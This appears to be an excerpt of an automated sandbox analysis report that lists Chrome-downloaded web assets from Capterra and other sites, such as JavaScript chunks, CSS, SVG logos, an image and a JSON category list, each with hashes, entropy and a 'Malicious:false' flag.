                                                                                                                                                                                                        MD5:41B66EFCCB1313801667D4D9DE99BC74
                                                                                                                                                                                                        SHA1:A9CFE9403949539D94C1FBFBDD1D4EBFCE72D8F2
                                                                                                                                                                                                        SHA-256:CC4E800FF4EFCF53010C3B4FC5FABB8A0872C7E3E227ABFD51356E130A6EC60E
                                                                                                                                                                                                        SHA-512:D401268B09760AB6854EF693D854B277AD0ED4C018121AA2DC614CF2FFDE9ACDCA6B847464AE02BDEAC12DF65D0523BF530683BD1D05FBC47D243D5F238E7746
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9615],{67754:function(e,t,a){var r=a(534);a.o(r,"useParams")&&a.d(t,{useParams:function(){return r.useParams}}),a.o(r,"usePathname")&&a.d(t,{usePathname:function(){return r.usePathname}}),a.o(r,"useRouter")&&a.d(t,{useRouter:function(){return r.useRouter}}),a.o(r,"useSearchParams")&&a.d(t,{useSearchParams:function(){return r.useSearchParams}})},26863:function(e,t,a){a.d(t,{default:function(){return s.a}});var r=a(25327),s=a.n(r)},30359:function(e,t,a){Object.defineProperty(t,"$",{enumerable:!0,get:function(){return s}});let r=a(71364);function s(e){let{createServerReference:t}=a(18786);return t(e,r.callServer)}},97712:function(e,t,a){let r;a.d(t,{z:function(){return e6}}),(e0=e9||(e9={})).assertEqual=e=>e,e0.assertIs=function(e){},e0.assertNever=function(e){throw Error()},e0.arrayToEnum=e=>{let t={};for(let a of e)t[a]=a;return t},e0.getValidEnumValues=e=>{let t=e0.objectKeys(e).filter(t=>"number"!=typeof e[e[t]]),a=
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (42312)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):657821
                                                                                                                                                                                                        Entropy (8bit):5.563419225782083
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:vIPMgec2NlbsBICMQ/Zk9hKkYQl8skN+H1yMp2dBO7NQzPh8Bq:A08UlbsBIj/kN+H1yMQdBO7yzeBq
                                                                                                                                                                                                        MD5:269ED64386507906A1A80D570BC21480
                                                                                                                                                                                                        SHA1:6BACDC786859B5D9B6F5DF0B3806CD9A54F04197
                                                                                                                                                                                                        SHA-256:904A22A0F87B213C8E6919C4D680B14017E6CC437025724D5E1164AAF6CA4469
                                                                                                                                                                                                        SHA-512:70CA0A3E8DB2EFA748F73A488DB46CE7E7FDA2642E5973D500F722ED91007A58CA9182695F05F9F76A5990BC3D80660814CB8F1DF7B1DA8ACD4908C2A7562241
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:./*!. * Webflow: Front-end site library. * @license MIT. * Inline scripts may access the api using an async handler:. * var Webflow = Webflow || [];. * Webflow.push(readyFunction);. */..(()=>{var cw=Object.create;var ki=Object.defineProperty;var hw=Object.getOwnPropertyDescriptor;var fw=Object.getOwnPropertyNames;var pw=Object.getPrototypeOf,dw=Object.prototype.hasOwnProperty;var Ee=(e,t)=>()=>(e&&(t=e(e=0)),t);var E=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports),Ue=(e,t)=>{for(var r in t)ki(e,r,{get:t[r],enumerable:!0})},ih=(e,t,r,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let i of fw(t))!dw.call(e,i)&&i!==r&&ki(e,i,{get:()=>t[i],enumerable:!(n=hw(t,i))||n.enumerable});return e};var me=(e,t,r)=>(r=e!=null?cw(pw(e)):{},ih(t||!e||!e.__esModule?ki(r,"default",{value:e,enumerable:!0}):r,e)),dt=e=>ih(ki({},"__esModule",{value:!0}),e);var $s=E(()=>{"use strict";window.tram=function(e){function t(M,j){var W=new k.Bare;return W.init(M,j)}function r(M){return M.replac
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:C source, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):95245
                                                                                                                                                                                                        Entropy (8bit):5.313505721268758
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:wpHUAAOZ01eI11yGbqtOZ8uH/CUU6Y6/ATdT2BN9O1BWtyuutiVXLMGHh6A+ZjqS:wMOpV2ft2iVo+IKDAwQPOeH5cB/1n2X
                                                                                                                                                                                                        MD5:97048519F4A5052076780A0FF665D6A4
                                                                                                                                                                                                        SHA1:94C4D0099D23A1937521B74E2904D876A7CE7C2A
                                                                                                                                                                                                        SHA-256:63754850F22F6479EA5397C1975404E85D3239D4F9D8C7CCFDE20F554CFED73A
                                                                                                                                                                                                        SHA-512:968A72A8ABB9893548790EAB2FC3C07EED38E0D3132A8055D7766C2918E9C8293D6AB7E330EA1E6DADA65575E8DBF0F4DCD78078E9F31D4B4AA9C2C4DEFAD382
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/16.d215b579.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[16],{"+Ry9":function(e,t,n){"use strict";var a=n("mj2O"),r=n.n(a),c=n("7SM1"),i=n("nfbA"),o=n("QtlZ"),u=n("SsZN"),s=n("B8JY"),d=n("Hvhg"),l=n("SFoa"),b=n("TDUE"),f=n("da4L"),v=n("hm8b"),p=n("LVcX"),O=n("pqMu"),g=n("PjZB"),m=n("gG69"),E=n("0lfv"),j=n("3DW5"),I=n("uIJS"),C=n("LvsC"),h=n("qytN"),_=n("7jL2"),A=n("K7i0"),y=n("xwTo"),S=n("g6eD"),T=n("7BJg");function _createSuper2(e){return function(){var t,n=Object(_.a)(e);if(function isNativeReflectConstruct(){if("undefined"===typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"===typeof Proxy)return!0;try{return Date.prototype.toString.call(Reflect.construct(Date,[],function(){})),!0}catch(e){return!1}}()){var a=Object(_.a)(this).constructor;t=Reflect.construct(n,arguments,a)}else t=n.apply(this,arguments);return Object(h.a)(this,t)}}var x=100,k=new(function(e){Object(C.a)(AgentMessageEventBuffer,e);var t=_createSuper2(AgentMessageEventBuffer);func
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):609249
                                                                                                                                                                                                        Entropy (8bit):6.007587187918157
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:AUA3ZObe1rlf84Nr+rqqAm/842wTwezcBTXIfLrfagTF1:DGMb6Xq1Am/YwpeoJ1
                                                                                                                                                                                                        MD5:5D0CA95E3882606D49AC7840249DB6AF
                                                                                                                                                                                                        SHA1:919AEF97EE44C0D3BE5D1904C1B236B3A7B4F3A0
                                                                                                                                                                                                        SHA-256:6E4F31393DDF457DBDDB1DB5B11A74E33E2CA2B2BA46B593A4CD3607296DC53E
                                                                                                                                                                                                        SHA-512:77FD0237A002A2B4ED6395A644C3FAC995B8E46FE67FF2834E6718C75D10133711661FE7C71EB6BE2EA088E5CA727C0EE94D06F84FBA33086901621DF2C5F750
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>5</title>. <defs>. <path d="M10.0731707,0 L107.926829,0 C113.490088,0 118,4.50991215 118,10.0731707 L118,107.926829 C118,113.490088 113.490088,118 107.926829,118 L10.0731707,118 C4.50991215,118 0,113.490088 0,107.926829 L0,10.0731707 C0,4.50991215 4.50991215,0 10.0731707,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" i
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12808
                                                                                                                                                                                                        Entropy (8bit):3.833710566534228
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Pk20wRyjaKzQ6SsLDBjE1vPBDELW3acUWL85rGjPxqOn0ahwKLBmpHKbX7O0bo:Pk2RyjDzjSMNEJRacUWN9qOn0ahw1PH
                                                                                                                                                                                                        MD5:AA3A6F9864F4FEA8E231A93FBDF3439E
                                                                                                                                                                                                        SHA1:A2BA5673B2F1191518F0D4D784AE3AD3CCC8882C
                                                                                                                                                                                                        SHA-256:74AF4CDACE06A37CD37510DDD273E1C0E55CAF7B678CADD9B55B65F9B5F25C39
                                                                                                                                                                                                        SHA-512:BB8EF23472353641D048E09585FE27D71B1813F0CD3E2146C504AB3FE210ACC7395C0B0EC082D877F751AF2E606A14211C3A8D247B660DD7B530C82A3B4C9A1A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/static/logos/capterra-logo.svg
                                                                                                                                                                                                        Preview:<svg width="180" height="40" viewBox="0 0 180 40" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M0.416626 14.7072L16.8372 14.7096L26.8223 14.7121V4.7182L0.416626 14.7072Z" fill="#FF9D28"/>.<path d="M26.8224 4.71837V40L39.2927 0L26.8224 4.71837Z" fill="#68C5ED"/>.<path d="M26.8222 14.7122L16.8372 14.7097L26.8222 39.9999V14.7122Z" fill="#044D80"/>.<path d="M0.416626 14.7076L19.3979 21.1992L16.8372 14.71L0.416626 14.7076Z" fill="#E54747"/>.<path d="M60.9073 30.7118C60.7627 30.8579 60.521 31.0407 60.1833 31.2604C59.8456 31.48 59.4059 31.6985 58.8629 31.9181C58.3199 32.1366 57.6567 32.3255 56.8732 32.4838C56.0897 32.6421 55.1908 32.7207 54.1789 32.7207C52.2257 32.7207 50.5372 32.4041 49.1148 31.7709C47.6923 31.1377 46.5165 30.2541 45.5884 29.1215C44.6604 27.9888 43.9789 26.6488 43.5453 25.1026C43.1116 23.5564 42.8942 21.8568 42.8942 20.005C42.8942 18.1545 43.1286 16.4426 43.5999 14.8719C44.07 13.3011 44.7758 11.9427 45.716 10.7977C46.6562 9.65281 47.832 8.75823 49.2423 8.11275C50
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11315), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11315
                                                                                                                                                                                                        Entropy (8bit):5.349789886754914
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:mh5B5CxdAiIhavC4zKd4TYzCaVdP/kCgdCJ/Cb4CkdglCNmtdjBLCpmCVT0mEjCp:mOdjUCzKdnVdud96d1adZCOpZdCJ
                                                                                                                                                                                                        MD5:1146B760CE11CD2AA55780CFFD213EF4
                                                                                                                                                                                                        SHA1:889B87CCFE1D79E1127DF92A16705955E99D3F94
                                                                                                                                                                                                        SHA-256:F76DCA947C9545F4F9C47A54C386670DE48D9159AA16125D2624698D2B21E2D7
                                                                                                                                                                                                        SHA-512:D784D800A4705AC1D8D796CB88870EBDE518F8359760B5E2D7CBFE3C6ED8C40FE5C2B2B248BD9C4CC95AF2980C2FA1ADA19235EB8CE72C66A100F0395BF6CB32
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/5430-253c90c823f8668d.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5430],{67389:function(e,t,r){r.d(t,{Z:function(){return s}});var n=r(2784),o=r(2550),a=r(16734),l=r(94673);function i(e){return(i="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}var c=["className","color","isInteractive","padding","children","colorMode"];function u(){return(u=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}var f=n.forwardRef(function(e,t){var r,f,s,d=e.className,p=e.color,b=e.isInteractive,v=e.padding,y=e.children,m=e.colorMode,O=function(e,t){if(null==e)return{};var r,n,o=function(e,t){if(null==e)return{};var r,n,o={},a=Object.keys(e);for(n=0;n<a.length;n++)r=a[n],t.indexOf(r)>=0||(o[r]=e[r
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (22390)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):22455
                                                                                                                                                                                                        Entropy (8bit):4.952827256925486
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:DCw2s7JXYS7JXY55CmIWG7SEZEG/lmvwMwaN0gimQDC+QbkZE/JD27OsFRu8eVmY:mw9HETwaN0gimQDC+QbkZE/hCOOaFSfi
                                                                                                                                                                                                        MD5:F5CFDE6BD28151B72CCD3B79B1398A24
                                                                                                                                                                                                        SHA1:FEFD85994D43FAFD1CF0841FD102CDB9EAECB6EA
                                                                                                                                                                                                        SHA-256:ABC98526D646DD4801F026857F8AB3C853CA6DD3F4A0E3D5887FEADABB8A1CE5
                                                                                                                                                                                                        SHA-512:BC866AAEBFC4371AAC06C366CC9325251039AFE251995B3C072C4A212BF34CE5C9744F56BD0813B47B27DB065D3ECF9E72059BDE6BB489F877E4DA43F69AF65B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/css/538d90e86755aff1.css
                                                                                                                                                                                                        Preview:/*.! tailwindcss v3.4.10 | MIT License | https://tailwindcss.com.*/*,:after,:before{box-sizing:border-box;border:0 solid}:after,:before{--tw-content:""}:host,html{line-height:1.5;-webkit-text-size-adjust:100%;-moz-tab-size:4;-o-tab-size:4;tab-size:4;font-family:ui-sans-serif,system-ui,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;font-feature-settings:normal;font-variation-settings:normal;-webkit-tap-highlight-color:transparent}body{margin:0;line-height:inherit}hr{height:0;color:inherit;border-top-width:1px}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace;font-feature-settings:normal;font-variation-settings:normal;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34474)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):59852
                                                                                                                                                                                                        Entropy (8bit):5.383826580536156
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:yrbtCnNxFEuCytGbtCn1x1EIC0DkTVBdl28t9If/kIL6rNDZlfHgDC1z/UF4VN:stKGtSvITVXlP0/9GrB3Hp1bUF4X
                                                                                                                                                                                                        MD5:0251956725D0D16860A49D1A7ACA1831
                                                                                                                                                                                                        SHA1:33A3CD51A0FB6639E9A36F08A8FD26953BEE69B7
                                                                                                                                                                                                        SHA-256:4345EF5A82ADD26BF12CA5240EB9F2B5D018AC14C4D02CF972CBB9BC8828C0FB
                                                                                                                                                                                                        SHA-512:DF91F7FD9BAFBD500B70A23E7281BEB6C91D6D38A657E87D0A6AA452C5061CD38CB87AFDB0609BE7031809ED8F0F9B27E83169392DEC7672A1E762FE76AE151E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/4823-d8ba37a6dd35bbbb.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4823],{38458:function(t,e,r){"use strict";r.d(e,{S1:function(){return m},qP:function(){return d},vP:function(){return w}});var n,o,i=r(20455),u=r(46385).lW;function a(t){return(a="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}function f(t,e){var r=Object.keys(t);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(t);e&&(n=n.filter(function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable})),r.push.apply(r,n)}return r}function c(t){for(var e=1;e<arguments.length;e++){var r=null!=arguments[e]?arguments[e]:{};e%2?f(Object(r),!0).forEach(function(e){s(t,e,r[e])}):Object.getOwnPropertyDescriptors?Object.defineProperties(t,Object.getOwnPropertyDescriptors(r)):f(Object(r)).forEach(function(e){Object.defineProperty(t,e,Object.getOwnPropertyDescriptor(r,e))}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7219
                                                                                                                                                                                                        Entropy (8bit):4.965108263631849
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LZSZrq7UvjavVvkEwYQ5ttZzeVfhGql+dhHK1gfGwUBURfiORtNJbSbyH:rUvmvVbrQ7wf0RdhKBdBUtZVb+yH
                                                                                                                                                                                                        MD5:E2B7DCE09356545F72E236BA66C055BB
                                                                                                                                                                                                        SHA1:271F2D58E03C38F0D1C7A56D5D8DA5636E491307
                                                                                                                                                                                                        SHA-256:37C420323A40793552B7FD3EAB34C92F6D00D017D47CCEAA277B7D59637D0B79
                                                                                                                                                                                                        SHA-512:F396A1CC1F3AAACFD571FF3930C3A6D9858707ECD07332E55CCF6DFA188F6E07F78E256B967C044F1373D9797767125A0AF291BB170463C28A1098499A3CBE5D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:[{"id":"fae4a9b6-c5fb-461e-bcb5-9383e215bcc3","name":"Inventory Control"},{"id":"8bf2a655-913e-445c-bf66-5fbaec13745c","name":"Property Management"},{"id":"6ba0e397-1df9-45ad-ad75-82d479d0c0be","name":"Human Resources"},{"id":"d1cb4e56-983a-416d-8d02-69a35b0a337e","name":"HVAC"},{"id":"669d11f4-0937-4967-b147-8eec8cbd1120","name":"Employee Scheduling"},{"id":"4c7ba4f6-a5c3-4fcf-bb0b-388597ecee9d","name":"CRM"},{"id":"19345941-9e13-48df-b935-8c7bc5469c94","name":"Network Security"},{"id":"2c4a521a-9623-411f-a0bc-e97bd500fa53","name":"Real Estate Property Management"},{"id":"79bb116b-8441-4448-a7bb-63a264450f58","name":"Cloud Management"},{"id":"9cffd4a5-739d-448a-8ef8-05cfdbad564f","name":"CMMS"},{"id":"6a1c5934-4c0e-421b-a62d-8a8a14882d34","name":"Network Monitoring"},{"id":"cb74f37a-e855-4705-ac54-35ef9000cbc2","name":"Payroll"},{"id":"9a9d31a6-d9e9-4796-9a56-983f7262d148","name":"Field Service Management"},{"id":"e96d0ffb-321d-4496-bcc6-18b0a61efa31","name":"Construction Estimating"}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3746
                                                                                                                                                                                                        Entropy (8bit):4.669796676554552
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:E+fNruqwqdK6/ERl/modd01rZHFIk5/iMGbv:1NvrK47Kd0HltVM
                                                                                                                                                                                                        MD5:7E8ACE7A1BD895131C0E9549808516BA
                                                                                                                                                                                                        SHA1:429DFF336A9D19F0D81E579712556FC3600539F0
                                                                                                                                                                                                        SHA-256:386D398E46631D8291C9D7D2142CE0C6186A251B5E6E52F6A78338D9A22050E2
                                                                                                                                                                                                        SHA-512:2650FCD3BD5A66B3F81D78E71963ED197E111040DBBABBDB2D6FF1255981CCE1D6F5BB0450066BEB36A2D79478F93E56DE1A11461DC487F8DCCECBBCD5DFC9F2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/logo_white_text.svg
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 18.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 38.3 100 23.3" enable-background="new 0 38.3 100 23.3" xml:space="preserve">..<g id="publicate_1_" enable-background="new ">...<g id="publicate">....<g>.....<path fill="#FFFFFF" d="M32.2,46.3c-1,0-1.8,0.4-2.5,1.1v-0.9h-2.3v11.4h2.3v-4.1c0.6,0.8,1.5,1.2,2.4,1.2c1,0,1.9-0.4,2.7-1.3......c0.8-0.8,1.1-1.9,1.1-3.1c0-1.2-0.4-2.2-1.1-3.1C34,46.7,33.1,46.3,32.2,46.3z M32.9,52.3c-0.4,0.4-0.9,0.6-1.4,0.6......s-1-0.2-1.4-0.6c-0.4-0.4-0.6-1-0.6-1.7c0-0.7,0.2-1.3,0.6-1.7c0.4-0.5,0.8-0.7,1.4-0.7c0.6,0,1,0.2,1.4,0.7s0.6,1,0.6,1.7......C33.5,51.3,33.4,51.8,32.9,52.3z M43,50.9c0,0.6-0.2,1.1-0.5,1.5c-0.3,0.3-0.7,0.5-1.2,0.5c-0.9,0-1.4-0.6-1.4-1.9v-4.6h-2.3v5.1......c0,1.1,0.3,2,0.9,2.6c0.6,0.6,1.4,0.9,2.3,0.9c0.9,0,1.7-0.4,2.2-1
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7207)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):7208
                                                                                                                                                                                                        Entropy (8bit):5.164123343165375
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:HA1SI+LtL9xW+XUB1SAfQu+BzaNPQznTjdNs6L:g1SIaxWLym+TD3
                                                                                                                                                                                                        MD5:F046BFA3E2CD2807E16D96CF04BDD930
                                                                                                                                                                                                        SHA1:E1FFB6FC6599857968CE3A361A2040FBB541F4EC
                                                                                                                                                                                                        SHA-256:8E6B3272816C9B6EFEB0B3CCC16326C123D9860F38D7C7C4FC215334559996E2
                                                                                                                                                                                                        SHA-512:C9718C6FE21E0D4D0AF31C393466A467478E9CF6DF4BDCCE2AD52F4CE4C00CEECF0296239A0FB65E128047035A02CDB684763038132A106D53167B5D1B2CAB62
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://unpkg.com/web-vitals@4.2.3/dist/web-vitals.iife.js
                                                                                                                                                                                                        Preview:var webVitals=function(e){"use strict";var n,t,r,i,o,a=-1,c=function(e){addEventListener("pageshow",(function(n){n.persisted&&(a=n.timeStamp,e(n))}),!0)},u=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},s=function(){var e=u();return e&&e.activationStart||0},f=function(e,n){var t=u(),r="navigate";a>=0?r="back-forward-cache":t&&(document.prerendering||s()>0?r="prerender":document.wasDiscarded?r="restore":t.type&&(r=t.type.replace(/_/g,"-")));return{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},d=function(e,n,t){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){n(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},t||{})),r}}catch(e
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6508
                                                                                                                                                                                                        Entropy (8bit):7.476986023704862
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7jI5N26MT0D5MdtbZPAVwzVJFrdVcvc3ExiJosnIbOkurN3jpbk:+7koYNMtKwXFBVq7iosn4jurNzBk
                                                                                                                                                                                                        MD5:F82CC8569F1D1B208C91F53CFE15BF6D
                                                                                                                                                                                                        SHA1:34F1DC9E20752F8476DD4F18482484187EB9B6A4
                                                                                                                                                                                                        SHA-256:B788A7884628A58ABD11EED42D876DAA7D4636F461125619764C1AF346EA3EDD
                                                                                                                                                                                                        SHA-512:15C415FC7283DFABC9AAC73078EC19169B267E39D4F069D5A802FA916C34BE1627293462CAF680FFE8B6F518F51A03F0A9F732DDA75A142580F22A9303FDA21B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/5152f7c6-61ed-4168-b89f-f436d97ebccd.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............8...4.................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......l...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6145), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6145
                                                                                                                                                                                                        Entropy (8bit):5.4151225877817915
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Dp6cF7ZZ7IRn+DVk3+kk21uulfaN9kV41w6C+:96k7fIRn+DVk3vk2oulfabkg2+
                                                                                                                                                                                                        MD5:6D74156C5B845474542B02E11A246297
                                                                                                                                                                                                        SHA1:B50FAE1CDE99F95D3F67ED1DC52C07C03302684C
                                                                                                                                                                                                        SHA-256:CB33A5B504120FFB0A2B976F60F1A21EE07078D1D35097EA768515AECC2DC7FE
                                                                                                                                                                                                        SHA-512:F2621CD9A37E0D515FCD31F325B49BBF653E88F993EAB5F0A7621F7820B86EF64F10EA413E2E6918DEAD6121F987EDDD67BCBB161DB029D880434297309D4B07
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:!function(e){function webpackJsonpCallback(c){for(var r,d,t=c[0],n=c[1],_=c[2],u=0,i=[];u<t.length;u++)d=t[u],a[d]&&i.push(a[d][0]),a[d]=0;for(r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r]);for(o&&o(c);i.length;)i.shift()();return f.push.apply(f,_||[]),checkDeferredModules()}function checkDeferredModules(){for(var e,c=0;c<f.length;c++){for(var r=f[c],d=!0,t=1;t<r.length;t++){var n=r[t];0!==a[n]&&(d=!1)}d&&(f.splice(c--,1),e=__webpack_require__(__webpack_require__.s=r[0]))}return e}var c={},r={6:0},a={6:0},f=[];function __webpack_require__(r){if(c[r])return c[r].exports;var a=c[r]={i:r,l:!1,exports:{}};return e[r].call(a.exports,a,a.exports,__webpack_require__),a.l=!0,a.exports}__webpack_require__.e=function requireEnsure(e){var c=[];r[e]?c.push(r[e]):0!==r[e]&&{1:1,3:1,4:1,8:1,16:1,23:1,25:1,27:1,28:1,30:1,31:1,33:1,35:1,36:1,38:1,39:1,44:1,45:1,46:1,47:1,48:1}[e]&&c.push(r[e]=new Promise(function(c,a){for(var f="assets/css/"+({}[e]||e)+"."+{0:"31d6cfe0",1:"fdc718c4",2:"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
